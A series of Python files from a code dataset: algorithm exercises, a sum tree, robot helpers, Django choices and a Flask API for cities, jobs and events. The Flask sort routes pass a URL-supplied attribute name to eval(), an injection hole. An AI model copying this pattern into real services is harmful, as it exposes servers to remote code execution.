subtree\n\n'''\n\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def deleteNode(self, root, key):\n \"\"\"\n :type root: TreeNode\n :type key: int\n :rtype: TreeNode\n \"\"\"\n if not root:\n return root\n if key < root.val:\n root.left = self.deleteNode(root.left, key)\n elif key > root.val:\n root.right = self.deleteNode(root.right, key)\n else:\n if not root.left:\n return root.right\n if not root.right:\n return root.left\n node = self.findMin(root.right)\n root.val = node.val\n root.right = self.deleteNode(root.right, root.val)\n return root\n\n def findMin(self, root):\n while root and root.left:\n root = root.left\n return root\n\n\n# iterative\n\n'''\nFind the node to be removed and its parent using binary search, and then use deleteRootNode to delete the root node of the subtree and return the new root node. This idea is taken from https://discuss.leetcode.com/topic/67309/an-easy-understanding-o-h-time-o-1-space-java-solution.\n\nI'd also like to share my thinkings of the other solutions I've seen.\n\nThere are many solutions that got high votes using recursive approach, including the ones from the Princeton's Algorithm and Data Structure book. Don't you notice that recursive approach always takes extra space? Why not consider the iterative approach first?\nSome solutions swap the values instead of swapping the nodes. In reality, the value of a node could be more complicated than just a single integer, so copying the contents might take much more time than just copying the reference.\nAs for the case when both children of the node to be deleted are not null, I transplant the successor to replace the node to be deleted, which is a bit harder to implement than just transplant the left subtree of the node to the left child of its successor. The former way is used in many text books too. Why? My guess is that transplanting the successor can keep the height of the tree almost unchanged, while transplanting the whole left subtree could increase the height and thus making the tree more unbalanced.\n\n'''\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def deleteNode(self, root, key):\n \"\"\"\n :type root: TreeNode\n :type key: int\n :rtype: TreeNode\n \"\"\"\n curr = root # target, the node with the key and which should be deleted\n prev = None\n while curr and curr.val != key:\n prev = curr\n if key < curr.val:\n curr = curr.left\n else:\n curr = curr.right\n if not prev:\n return self.deleteRootNode(curr)\n if prev.left == curr:\n prev.left = self.deleteRootNode(curr)\n else:\n prev.right = self.deleteRootNode(curr)\n return root\n\n def deleteRootNode(self, root):\n # delete the target node and return the new root node\n if not root:\n return root\n if not root.left:\n return root.right\n if not root.right:\n return root.left\n # minKid: the minimum node of the right subtree\n minKid = root.right\n # we need swap root and minKid\n # minKid is the new root\n while minKid and minKid.left:\n parent = minKid\n minKid = minKid.left\n minKid.left = root.left\n if minKid != root.right:\n parent.left = minKid.right\n minKid.right = root.right\n return minKid\n\n# another iterative method, same idea\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def deleteNode(self, root, key):\n \"\"\"\n :type root: TreeNode\n :type key: int\n :rtype: TreeNode\n \"\"\"\n curr = root # target, the node with the key and which should be deleted\n prev = None\n while curr and curr.val != key:\n prev = curr\n if key < curr.val:\n curr = curr.left\n else:\n curr = curr.right\n if not prev:\n return self.deleteRootNode(curr)\n if prev.left == curr:\n prev.left = self.deleteRootNode(curr)\n else:\n prev.right = self.deleteRootNode(curr)\n return root\n\n def deleteRootNode(self, root):\n # delete the target node and return the new root node\n if not root:\n return root\n if not root.left:\n return root.right\n if not root.right:\n return root.left\n # maxKid: the max node of the left subtree\n maxKid = root.left\n # we need swap root and maxKid\n # maxKid is the new root\n while maxKid and maxKid.right:\n parent = maxKid\n maxKid = maxKid.right\n maxKid.right = root.right\n if root.left != maxKid:\n parent.right = maxKid.left\n maxKid.left = root.left\n return maxKid\n\n\n# 2020/04/04, divide and conquer? leetcode's solution\n\nclass Solution:\n def deleteNode(self, root: TreeNode, key: int) -> TreeNode:\n if not root: return root\n if root.val < key:\n root.right = self.deleteNode(root.right, key)\n elif root.val > key:\n root.left = self.deleteNode(root.left, key)\n else:\n if not root.left and not root.right:\n root = None\n elif root.right:\n root.val = self.find_min(root.right)\n root.right = self.deleteNode(root.right, root.val)\n else:\n root.val = self.find_max(root.left)\n root.left = self.deleteNode(root.left, root.val)\n return root\n\n def find_min(self, root):\n while root.left: root = root.left\n return root.val\n\n def find_max(self, root):\n while root.right: root = root.right\n return root.val\n\n# iterative implementation of the above algorithm\n\nclass Solution:\n def deleteNode(self, root: TreeNode, key: int) -> TreeNode:\n if not root: return root\n prev, target = self.find_node(root, key)\n if not target: return root\n if not prev:\n return self.delete_rootNode(target)\n if prev.left == target:\n prev.left = self.delete_rootNode(target)\n else:\n prev.right = self.delete_rootNode(target)\n return root\n\n def find_node(self, root, key):\n prev = None\n while root and root.val != key:\n prev = root\n if root.val < key:\n root = root.right\n else:\n root = root.left\n return prev, root\n\n def find_min(self, node):\n parent = None\n while node.left:\n parent = node\n node = node.left\n return parent, node\n\n def find_max(self, node):\n parent = None\n while node.right:\n parent = node\n node = node.right\n return parent, node\n\n def delete_rootNode(self, node):\n if not node.left and not node.right:\n return None\n elif node.right:\n parent, dummy = self.find_min(node.right)\n dummy.left = node.left\n if dummy != node.right:\n parent.left = dummy.right\n dummy.right = node.right\n return dummy\n else:\n parent, dummy = self.find_max(node.left)\n dummy.right = node.right\n if dummy != node.left:\n parent.right = dummy.left\n dummy.left = node.left\n return dummy\n\n\n\n\n\n","sub_path":"0450. Delete Node in a BST.py","file_name":"0450. Delete Node in a BST.py","file_ext":"py","file_size_in_byte":9283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"543898642","text":"\n\n#calss header\nclass _PROXY():\n\tdef __init__(self,): \n\t\tself.name = \"PROXY\"\n\t\tself.definitions = [u'authority given to a person to act for someone else, such as by voting for them in an election, or the person who this authority is given to: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_proxy.py","file_name":"_proxy.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"173693527","text":"#!/usr/bin/env python\n\nimport argparse\n\nfrom chart_rbac import cleanup_local_dev\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=\"\"\"Clean up after using `configure_local_dev`.\"\"\"\n )\n parser.add_argument(\n \"-n\",\n \"--namespace\",\n default=\"default\",\n type=str,\n help=\"\"\"The namepspace in which we are going to listen for resources. Should match the\n corresponding flag used with `kopf run -n ...` \"\"\",\n )\n parser.add_argument(\n \"--use-context\",\n type=str,\n required=True,\n help=\"The context to set as current context when removing the amalthea created one.\",\n )\n args = parser.parse_args()\n cleanup_local_dev(args.use_context, args.namespace, [args.namespace])\n","sub_path":"utils/cleanup_local_dev.py","file_name":"cleanup_local_dev.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"146025915","text":"import sys\r\n\r\nwhile True:\r\n S = list(map(int,sys.stdin.readline().split()))\r\n if not S[0]:\r\n break\r\n for i in range(1,S[0]+1):\r\n for j in range(i+1,S[0]+1):\r\n for k in range(j+1,S[0]+1):\r\n for l in range(k+1,S[0]+1):\r\n for m in range(l+1,S[0]+1):\r\n for n in range(m+1,S[0]+1):\r\n print(S[i],S[j],S[k],S[l],S[m],S[n])\r\n print()\r\n\r\n","sub_path":"python_algorithm/Baekjoon/silver/6603.py","file_name":"6603.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"255587033","text":"from flask import Flask, jsonify, render_template, request\nfrom flask_cors import CORS, cross_origin\nfrom sqlalchemy import or_\nfrom models import City, Job, Event, application, db\nimport json\nimport requests\n\ncors = CORS(application)\n\n# ---------------- #\n# DATABASE QUERIES #\n# ---------------- #\ndef query_events():\n events = Event.query.all()\n return [e.toDict() for e in events]\n\n\ndef query_events_by_page(num):\n num = int(num)\n events = []\n all_events = query_events()\n for i in range(((num - 1) * 9), num * 9):\n if i >= len(all_events):\n break\n event = all_events[i]\n events.append(event)\n return events\n\n\ndef query_jobs():\n jobs = {\"Jobs\": []}\n job_objs = Job.query.all()\n for j in job_objs:\n jobs[\"Jobs\"].append(j.toDict())\n return jobs\n\n\ndef query_jobs_by_id(identifier):\n j = Job.query.get(identifier)\n return j.toDict()\n\n\ndef query_jobs_by_page(num):\n num = int(num)\n jobs = {\"Jobs\": []}\n all_jobs = query_jobs()[\"Jobs\"]\n for i in range(((num - 1) * 9), num * 9):\n if i >= len(all_jobs):\n break\n job = all_jobs[i]\n jobs[\"Jobs\"].append(job)\n return jobs\n\n\ndef query_cities():\n cities = {}\n city_objs = City.query.all()\n for c in city_objs:\n name = c.name\n cities[name] = c.toDict()\n return cities\n\n\ndef query_cities_by_state(state):\n cities = {}\n city_objs = City.query.filter_by(state=state).all()\n print(len(city_objs))\n for c in city_objs:\n name = c.name\n cities[name] = c.toDict()\n return cities\n\n\ndef query_cities_by_page(num):\n num = int(num)\n all_cities = query_cities()\n city_names = list(all_cities.keys())\n cities = {}\n for i in range(((num - 1) * 9), num * 9):\n if i >= len(city_names):\n break\n name = city_names[i]\n cities[name] = all_cities[name]\n return cities\n\n\n# ------------------ #\n# FILTER/SEARCH/SORT #\n# ------------------ #\ndef query_filter(query_results):\n results = []\n if query_results is None:\n return results\n if type(query_results[0]) is City:\n results = {}\n for i in range(len(query_results)):\n obj = query_results[i]\n if type(obj) is City:\n results[obj.name] = obj.toDict()\n else:\n results.append(obj.toDict())\n return results\n\n\ndef query_filter_by_page(query_results, num):\n results = []\n page = int(num)\n if query_results is None:\n return results\n if type(query_results[0]) is City:\n results = {}\n for i in range((page - 1) * 9, page * 9):\n if i >= len(query_results):\n break\n obj = query_results[i]\n if type(obj) is City:\n results[obj.name] = obj.toDict()\n else:\n results.append(obj.toDict())\n return results\n\n\n@application.route(\"/api//filter///\")\n@cross_origin()\ndef filter_results(model, attr, value):\n response = None\n if model == \"jobs\":\n # ADD ATTRIBUTES AS NECESSARY #\n jobs_query = None\n if attr == \"income\":\n if value == \"1\":\n jobs_query = Job.query.filter(Job.salary < 30000).all()\n elif value == \"2\":\n jobs_query = Job.query.filter(\n Job.salary >= 30000, Job.salary < 50000\n ).all()\n elif value == \"3\":\n jobs_query = Job.query.filter(\n Job.salary >= 50000, Job.salary < 70000\n ).all()\n elif value == \"4\":\n jobs_query = Job.query.filter(\n Job.salary >= 70000, Job.salary < 90000\n ).all()\n elif value == \"5\":\n jobs_query = Job.query.filter(Job.salary >= 90000).all()\n elif attr == \"edu\":\n if value == \"bac\":\n jobs_query = Job.query.filter_by(education=\"Bachelor's degree\").all()\n elif value == \"mas\":\n jobs_query = Job.query.filter_by(education=\"Master's degree\").all()\n elif value == \"phd\":\n jobs_query = Job.query.filter_by(\n education=\"Doctoral or professional degree\"\n ).all()\n elif attr == \"loc\":\n jobs_query = Job.query.filter(\n or_(\n Job.city1 == value,\n Job.city2 == value,\n Job.city3 == value,\n Job.city4 == value,\n Job.city5 == value,\n )\n ).all()\n response = jsonify(query_filter(jobs_query))\n\n elif model == \"cities\": # May Need to add average score to filter by average score\n cities = None\n if attr == \"col\":\n col = 2 * int(value)\n if col <= 2:\n cities = City.query.filter(City.cost_of_living <= 2.0).all()\n elif col <= 4:\n cities = City.query.filter(\n City.cost_of_living > 2.0, City.cost_of_living <= 4.0\n ).all()\n elif col <= 6:\n cities = City.query.filter(\n City.cost_of_living > 4.0, City.cost_of_living <= 6.0\n ).all()\n elif col <= 8:\n cities = City.query.filter(\n City.cost_of_living > 6.0, City.cost_of_living <= 8.0\n ).all()\n elif col <= 10:\n cities = City.query.filter(\n City.cost_of_living > 8.0, City.cost_of_living <= 10.0\n ).all()\n elif attr == \"pop\":\n population = value\n if population == \"1\":\n cities = City.query.filter(City.population <= 200000).all()\n elif population == \"2\":\n cities = City.query.filter(\n City.population > 200000, City.population < 999999\n ).all()\n elif population == \"3\":\n cities = City.query.filter(City.population >= 1000000).all()\n elif attr == \"state\":\n cities = City.query.filter_by(state=value).all()\n response = jsonify(query_filter(cities))\n\n elif model == \"events\":\n events = None\n if attr == \"city\":\n events = Event.query.filter_by(city=value).all()\n elif attr == \"state\":\n events = Event.query.filter_by(state=value).all()\n elif attr == \"duration\":\n if value == \"1\":\n events = Event.query.filter(Event.duration < 1).all()\n elif value == \"2\":\n events = Event.query.filter(\n Event.duration >= 1, Event.duration < 4\n ).all()\n elif value == \"3\":\n events = Event.query.filter(Event.duration >= 4).all()\n response = jsonify(query_filter(events))\n else:\n assert False # Just to debug and check if proper input is given\n\n return response\n\n\ndef search_query(model, query):\n if model == \"events\":\n events = Event.query\n events = events.filter(\n or_(\n Event.name.like(\"%\" + query + \"%\"),\n Event.summary.like(\"%\" + query + \"%\"),\n Event.address.like(\"%\" + query + \"%\"),\n Event.city.like(\"%\" + query + \"%\"),\n Event.state.like(\"%\" + query + \"%\"),\n Event.venue.like(\"%\" + query + \"%\"),\n )\n )\n return [e for e in events]\n elif model == \"jobs\":\n jobs = Job.query\n jobs = jobs.filter(\n or_(\n Job.job_title.like(\"%\" + query + \"%\"),\n Job.description.like(\"%\" + query + \"%\"),\n Job.education.like(\"%\" + query + \"%\"),\n Job.city1.like(\"%\" + query + \"%\"),\n Job.city2.like(\"%\" + query + \"%\"),\n Job.city3.like(\"%\" + query + \"%\"),\n Job.city4.like(\"%\" + query + \"%\"),\n Job.city5.like(\"%\" + query + \"%\"),\n )\n )\n return [j for j in jobs]\n elif model == \"cities\":\n cities = City.query\n cities = cities.filter(\n or_(City.name.like(\"%\" + query + \"%\"), City.state.like(\"%\" + query + \"%\"))\n )\n return [c for c in cities]\n else:\n return \"Invalid model: \" + str(model)\n\n\n@application.route(\"/api//search/\")\n@cross_origin()\ndef search_results(model, query):\n if model == \"jobs\" or model == \"events\":\n return jsonify([m.toDict() for m in search_query(model, query)])\n elif model == \"cities\":\n return jsonify({m.name: m.toDict() for m in search_query(model, query)})\n elif model == \"all\":\n events = search_query(\"events\", query)\n jobs = search_query(\"jobs\", query)\n cities = search_query(\"cities\", query)\n return jsonify(\n {\n \"events\": [e.toDict() for e in events],\n \"jobs\": [j.toDict() for j in jobs],\n \"cities\": [c.toDict() for c in cities],\n }\n )\n else:\n return \"Invalid model: \" + str(model)\n\n\n@application.route(\"/api//search//\")\n@cross_origin()\ndef search_results_page(model, query, page):\n if model == \"events\" or model == \"cities\" or model == \"jobs\":\n return jsonify(\n query_filter_by_page([m for m in search_query(model, query)], page)\n )\n elif model == \"all\":\n events = search_query(\"events\", query)\n jobs = search_query(\"jobs\", query)\n cities = search_query(\"cities\", query)\n events_page = query_filter_by_page([e for e in events], page)\n jobs_page = query_filter_by_page([j for j in jobs], page)\n cities_page = query_filter_by_page([c for c in cities], page)\n return jsonify(\n {\"events\": events_page, \"jobs\": jobs_page, \"cities\": cities_page}\n )\n else:\n return \"Invalid model: \" + str(model)\n\n\ndef sort_query(model, attribute):\n if model == \"events\":\n events = Event.query\n attr = eval(\"Event.\" + attribute)\n events = events.filter(attr.isnot(None)).order_by(attr)\n return events\n elif model == \"jobs\":\n jobs = Job.query\n attr = eval(\"Job.\" + attribute)\n jobs = jobs.filter(attr.isnot(None)).order_by(attr)\n return jobs\n elif model == \"cities\":\n cities = City.query\n attr = eval(\"City.\" + attribute)\n cities = cities.filter(attr.isnot(None)).order_by(attr)\n return cities\n else:\n return \"Invalid model: \" + str(model)\n\n\n@application.route(\"/api//sort/\")\n@cross_origin()\ndef sort_results(model, attribute):\n if model == \"events\" or model == \"cities\" or model == \"jobs\":\n return jsonify([m.toDict() for m in sort_query(model, attribute)])\n else:\n return \"Invalid model: \" + str(model)\n\n\n@application.route(\"/api//sort//\")\n@cross_origin()\ndef sort_results_page(model, attribute, page):\n if model == \"events\" or model == \"cities\" or model == \"jobs\":\n return jsonify(\n query_filter_by_page([m for m in sort_query(model, attribute)], page)\n )\n else:\n return \"Invalid model: \" + str(model)\n\n\ndef desc_sort_query(model, attribute):\n if model == \"events\":\n events = Event.query\n attr = eval(\"Event.\" + attribute)\n events = events.filter(attr.isnot(None)).order_by(attr.desc())\n return [e for e in events]\n elif model == \"jobs\":\n jobs = Job.query\n attr = eval(\"Job.\" + attribute)\n jobs = jobs.filter(attr.isnot(None)).order_by(attr.desc())\n return [j for j in jobs]\n elif model == \"cities\":\n cities = City.query\n attr = eval(\"City.\" + attribute)\n cities = cities.filter(attr.isnot(None)).order_by(attr.desc())\n return [c for c in cities]\n else:\n return \"Invalid model: \" + str(model)\n\n\n@application.route(\"/api//desc_sort/\")\n@cross_origin()\ndef desc_sort_results(model, attribute):\n if model == \"events\" or model == \"cities\" or model == \"jobs\":\n return jsonify([j.toDict() for j in desc_sort_query(model, attribute)])\n else:\n return \"Invalid model: \" + str(model)\n\n\n@application.route(\"/api//desc_sort//\")\n@cross_origin()\ndef desc_sort_results_page(model, attribute, page):\n if model == \"events\" or model == \"cities\" or model == \"jobs\":\n return jsonify(\n query_filter_by_page([m for m in desc_sort_query(model, attribute)], page)\n )\n else:\n return \"Invalid model: \" + str(model)\n\n\n# ---------- #\n# API ROUTES #\n# ---------- #\n@application.route(\"/api/\")\n@cross_origin()\ndef render_home_page():\n return render_template(\"home.html\")\n\n\n@application.route(\"/api/events\")\n@cross_origin()\ndef get_events():\n return jsonify(query_events())\n\n\n@application.route(\"/api/events/page/\")\n@cross_origin()\ndef get_events_by_page(num):\n return jsonify(query_events_by_page(num))\n\n\ndef get_jobs():\n return jsonify(query_jobs())\n\n\n@application.route(\"/api/jobs\")\ndef get_jobs():\n return jsonify(query_jobs())\n\n\n@application.route(\"/api/jobs/id/\")\n@cross_origin()\ndef get_one_job_by_id(id):\n return jsonify(query_jobs_by_id(id))\n\n\n@application.route(\"/api/jobs/page/\")\n@cross_origin()\ndef get_jobs_by_page(num):\n return jsonify(query_jobs_by_page(num))\n\n\n@application.route(\"/api/cities\")\n@cross_origin()\ndef get_cities():\n return jsonify(query_cities())\n\n\n@application.route(\"/api/cities/state/\")\n@cross_origin()\ndef get_cities_by_state(state):\n return jsonify(query_cities_by_state(state))\n\n\n@application.route(\"/api/cities/page/\")\n@cross_origin()\ndef get_cities_by_page(num):\n return jsonify(query_cities_by_page(num))\n\n\n@application.after_request\ndef after_request(response):\n response.headers.add(\"Access-Control-Allow-Credentials\", \"true\")\n return response\n\n\nif __name__ == \"__main__\":\n application.run()\n","sub_path":"backend/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":13973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"375735311","text":"import numpy as np\n\nclass sumTree():\n\n def __init__(self, capacity):\n self.capacity = capacity\n self.writer = 0\n self.tree = np.zeros(2*self.capacity - 1)\n self.data = np.zeros(self.capacity, dtype=object)\n self.n_entries = 0\n\n\n # Return the total sum, which is the value of the root\n def total(self):\n return self.tree[0]\n\n # Change the priority from the leaf to the root\n def _propagate(self, idx, change):\n parent = (idx - 1) // 2\n self.tree[parent] += change\n if parent != 0:\n self._propagate(parent, change)\n \n # Fetch sample on the leaf node\n def _retrive(self, idx, s):\n left = 2 * idx + 1\n right = 2 * idx + 2\n\n if left >= len(self.tree):\n return idx\n \n if self.tree[left] >= s:\n return self._retrive(left, s)\n else:\n return self._retrive(right, s - self.tree[left])\n\n # Add new data to the sum tree based on the priority\n # p : priority\n # data : transition\n def add(self, p, data):\n idx = self.writer + self.capacity - 1\n\n self.data[self.writer] = data\n self.update(idx, p)\n\n self.writer += 1\n if self.writer >= self.capacity:\n self.writer = 0\n \n if self.n_entries < self.capacity:\n self.n_entries += 1\n\n # Update the priority\n def update(self, idx, p):\n change = p - self.tree[idx]\n\n self.tree[idx] = p\n self._propagate(idx, change)\n\n\n # Get data\n # s : sum\n def get(self, s):\n idx = self._retrive(0,s)\n return (idx, self.tree[idx], self.data[idx - self.capacity + 1])\n\n ","sub_path":"CartPole/DQN/per/sumTree.py","file_name":"sumTree.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"556241366","text":"# Задание 1\n# Необходимо вывести имена всех учеников из списка с новой строки\n\nnames = ['Оля', 'Петя', 'Вася', 'Маша']\n# ???\\\nex1 = 'Excersise 1 \\n'\nfor name in names:\n print(name) \n\n# Задание 2\n# Необходимо вывести имена всех учеников из списка, рядом с именем показать количество букв в нём\n# Пример вывода:\n# Оля: 3\n# Петя: 4\nex2 = 'Excersise 2 \\n'\nnames2 = ['Оля', 'Петя', 'Вася', 'Маша']\nfor name2 in names2:\n print( f'{name2}: {len(name2)}')\n\n# Задание 3\n# Необходимо вывести имена всех учеников из списка, рядом с именем вывести пол ученика\nex3 = 'Excersise 3 \\n'\nis_male = {\n 'Оля': False, # если False, то пол женский\n 'Петя': True, # если True, то пол мужской\n 'Вася': True,\n 'Маша': False,\n}\nnames3 = ['Оля', 'Петя', 'Вася', 'Маша', 'Бобр']\nfor name3 in names3:\n sex = is_male.get(name3)\n if sex:\n print(f'{name3} is male')\n elif sex is False:\n print(f'{name3} is female')\n else:\n print(f'Sex is not defined for {name3}')\n\n\n# Задание 4\n# Даны группу учеников. Нужно вывести количество групп и для каждой группы – количество учеников в ней\n# Пример вывода:\n# Всего 2 группы.\n# Группа 1: 2 ученика.\n# Группа 2: 4 ученика.\nex4 = 'Excersise4 \\n'\ngroups4 = [\n ['Вася', 'Маша'],\n ['Вася', 'Маша', 'Саша', 'Женя'],\n ['Оля', 'Петя', 'Гриша'],\n]\nttl_groups = len(groups4)\nprint(f'Total groups: {ttl_groups}')\nfor group_number, group in enumerate(groups4,1):\n student_count = len(group) \n print(f'Group {group_number} has {student_count} student(s)')\n\n# # Задание 5\n# # Для каждой пары учеников нужно с новой строки перечислить учеников, которые в неё входят\n# # Пример вывода:\n# # Группа 1: Вася, Маша\n# # Группа 2: Оля, Петя, Гриша\nex5 = 'Excersise5 \\n'\ngroups5 = [\n ['Вася', 'Маша'],\n ['Оля', 'Петя', 'Гриша'],\n ['Вася', 'Маша', 'Саша', 'Женя'],\n]\nfor group_number, students in enumerate(groups5, 1):\n all_students = \", \".join(students)\n print(f'Group {group_number} has following student(s) {all_students} \\n')","sub_path":"for_challenges.py","file_name":"for_challenges.py","file_ext":"py","file_size_in_byte":2676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"378107041","text":"#!/usr/bin/python3\n\nfrom pyrob.api import *\n\n# dictionary for the label based access to moving \nmoving_functions = {\n 'right': move_right,\n 'left': move_left,\n 'up': move_up,\n 'down': move_down,\n}\n# dictionary for the label based access to wall checking\nwall_functions = {\n 'right': wall_is_on_the_right,\n 'left': wall_is_on_the_left,\n 'up': wall_is_above,\n 'down': wall_is_beneath,\n}\n# dictionary for opposite directions\nopposite_dir = {\n 'right': 'left',\n 'left': 'right',\n 'up': 'down',\n 'down': 'up', \n}\n\ndef move_to_wall (direct = 'right'):\n '''Moving the robot in the given direction till the wall\n\tdirect: ['right', 'leaft', 'up', 'down']'''\n\n move_direct, wall_on_the_way = moving_functions[direct], wall_functions[direct]\n while not wall_on_the_way():\n move_direct()\n\ndef move_along_the_wall (direct, wall_on_side_direct):\n '''Moving along the wall on the side in the given direction.\n Checking that wall is on the side than moving. So stops in the next point from the wall`s end\n direct: ['right', 'leaft', 'up', 'down']\n wall_on_side_direct: ['right', 'leaft', 'up', 'down']'''\n \n if direct == wall_on_side_direct:\n print (\"Direrctions shouldn`t be the same\")\n return\n\n move_direct, wall_on_the_way = moving_functions[direct], wall_functions[direct]\n wall_on_the_side = wall_functions[wall_on_side_direct]\n\n while wall_on_the_side():\n if not wall_on_the_way():\n move_direct()\n else:\n # stop function and prevent smashing in to the corner\n return\n\ndef action_in_the_hall (condition, direct = 'right', side_wall1 = 'up', side_wall2 = 'down', action = fill_cell):\n '''Moving down the hall and applying action if condition is True. Condition is checked on each step.\n Both of side_wall could be calculated automaticly, but passing through parametres allos to control condition \n condition: function with to params (2 side walls) to return True/False\n direct: ['right', 'leaft', 'up', 'down']\n side_wall1: ['right', 'leaft', 'up', 'down']\n side_wall2: ['right', 'leaft', 'up', 'down']\n action: anything'''\n\n move_direct, wall_on_the_way = moving_functions[direct], wall_functions[direct]\n wall_on_the_side1, wall_on_the_side2 = wall_functions[side_wall1], wall_functions[side_wall2]\n\n # checks starting position\n if condition(wall_on_the_side1, wall_on_the_side2):\n action()\n\n while not wall_on_the_way():\n move_direct()\n # checking new position for filling\n if condition(wall_on_the_side1, wall_on_the_side2):\n action()\n\ndef move_to_the_opposite_corner():\n '''Moving to the opposite corner of the field'''\n if wall_is_on_the_left():\n move_to_wall('right')\n else:\n move_to_wall('left')\n\n if wall_is_above():\n move_to_wall('down')\n else:\n move_to_wall('up')\n\ndef filling_the_line_from_end_to_end (direct):\n '''Moving the robot in the given direction till the wall, filling each point and going back\n direct: ['right', 'leaft', 'up', 'down']'''\n move_direct, wall_on_the_way = moving_functions[direct], wall_functions[direct]\n\n while not wall_on_the_way():\n fill_cell()\n move_direct()\n fill_cell()\n \n move_to_wall(opposite_dir[direct])\n\ndef draw_cross ():\n '''Draw cross from in the form of:\n AX0\n XXX\n 0X0\n where X are filled cells and A is start and finish\n no checks are provided'''\n move_right()\n fill_cell()\n move_down()\n fill_cell()\n move_right()\n fill_cell()\n move_left()\n move_down()\n fill_cell()\n move_up()\n move_left()\n fill_cell()\n move_up()\n\ndef draw_triangle (length, draw_direct, start_direct):\n move_direct = moving_functions[start_direct]\n back_direct = moving_functions[opposite_dir[start_direct]]\n\n next_line_direct = moving_functions[draw_direct]\n\n height = length // 2\n for i in range(height):\n line_len = length - 2 * (i + 1)\n for j in range (line_len):\n move_direct()\n fill_cell()\n back_direct(line_len)\n next_line_direct()\n move_direct()\n\n # moving back to starting position\n move_to_wall(opposite_dir[draw_direct])\n move_to_wall(opposite_dir[start_direct])","sub_path":"roborders.py","file_name":"roborders.py","file_ext":"py","file_size_in_byte":4318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"378554850","text":"\nCATEGORIAS_BANDERA = [\n ('BASE', 'BASE'),\n ('NIVEL', 'NIVEL')\n]\n\nNIVEL = [\n ('ASOCIADO A', 'ASOCIADO A'),\n ('ASOCIADO B', 'ASOCIADO B'),\n ('ASOCIADO C', 'ASOCIADO C'),\n ('TITULAR A', 'TITULAR A'),\n ('TITULAR B', 'TITULAR B'),\n ('TITULAR C', 'TITULAR C')\n]\n\nGPO_LABORAL = [\n ('DOCENTE INVESTIGADOR','DOCENTE INVESTIGADOR'),\n ('ACADÉMICO PROFESIONAL','ACADÉMICO PROFESIONAL'),\n ('TÉCNICO ACADÉMICO','TÉCNICO ACADÉMICO'),\n ('AUXILIAR/DOCENTE','AUXILIAR/DOCENTE')\n]\nCATEGORIA_COD = [\n ('TIEMPO COMPLETO','TIEMPO COMPLETO'),\n ('MEDIO TIEMPO','MEDIO TIEMPO'),\n ('HORA CLASE','HORA CLASE'),\n ('TIEMPO COMPLETO + HORA CLASE','TIEMPO COMPLETO + HORA CLASE'),\n ('MEDIO TIEMPO + HORA CLASE','MEDIO TIEMPO + HORA CLASE'),\n ('HORA CLASE DE TIEMPO COMPLETO','HORA CLASE DE TIEMPO COMPLETO'),\n ('HORA CLASE DE MEDIO TIEMPO','HORA CLASE DE MEDIO TIEMPO')\n]\nCATEGORIA_GRADOS = [\n ('BACHILLERATO', 'BACHILLERATO'),\n ('LICENCIATURA', 'LICENCIATURA'),\n ('MAESTRÍA', 'MAESTRÍA'),\n ('DOCTORADO', 'DOCTORADO'),\n ('POSDOCTORADO', 'POSDOCTORADO'),\n ('ESPECIALIDAD', 'ESPECIALIDAD')\n]\nESTADO_CIVIL = [\n ('CASADO','CASADO'),\n ('SOLTERO','SOLTERO'),\n ('UNIÓN LIBRE','UNIÓN LIBRE'),\n ('VIUDO','VIUDO'),\n ('DIVORCIADO','DIVORCIADO')\n]\nSEXO = [\n ('HOMBRE', 'HOMBRE'),\n ('MUJER', 'MUJER')\n]\nOFICIO = [\n ('COMISION MIXTA', 'COMISION MIXTA'),\n ('RECTOR', 'RECTOR')\n]\nVIA = [\n ('PUNTOS', 'PUNTOS'),\n ('REQUISITOS', 'REQUISITOS')\n]\nNIVELES_SNI = [\n ('CANDIDATO', 'CANDIDATO'),\n ('SNI 1', 'SNI 1'),\n ('SNI 2', 'SNI 2'),\n ('SNI 3', 'SNI 3')\n]","sub_path":"apps/docente/choices.py","file_name":"choices.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"225082903","text":"#!/usr/bin/env python\n\n# Definition for singly-linked list.\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution(object):\n def __init__(self):\n self.list = None\n self.back = None\n\n def addNode(self, val):\n node = ListNode(val)\n\n if not self.back:\n self.list = node\n self.back = node\n else:\n self.back.next = node\n self.back = node\n\n def printList(self, list):\n node = list\n n = []\n while node:\n n.append(str(node.val))\n node = node.next\n print(', '.join(n))\n\n def getList(self):\n return self.list\n\n def reorderList(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: void Do not return anything, modify head in-place instead.\n \"\"\"\n # 0, n, 1, n-1, 2, n-2,....\n l = []\n node = head\n while node:\n l.append(node)\n node = node.next\n\n if len(l) < 3:\n return head\n\n prev = None\n i, j = 0, len(l)-1\n while i < j:\n if prev:\n prev.next = l[i]\n l[i].next = 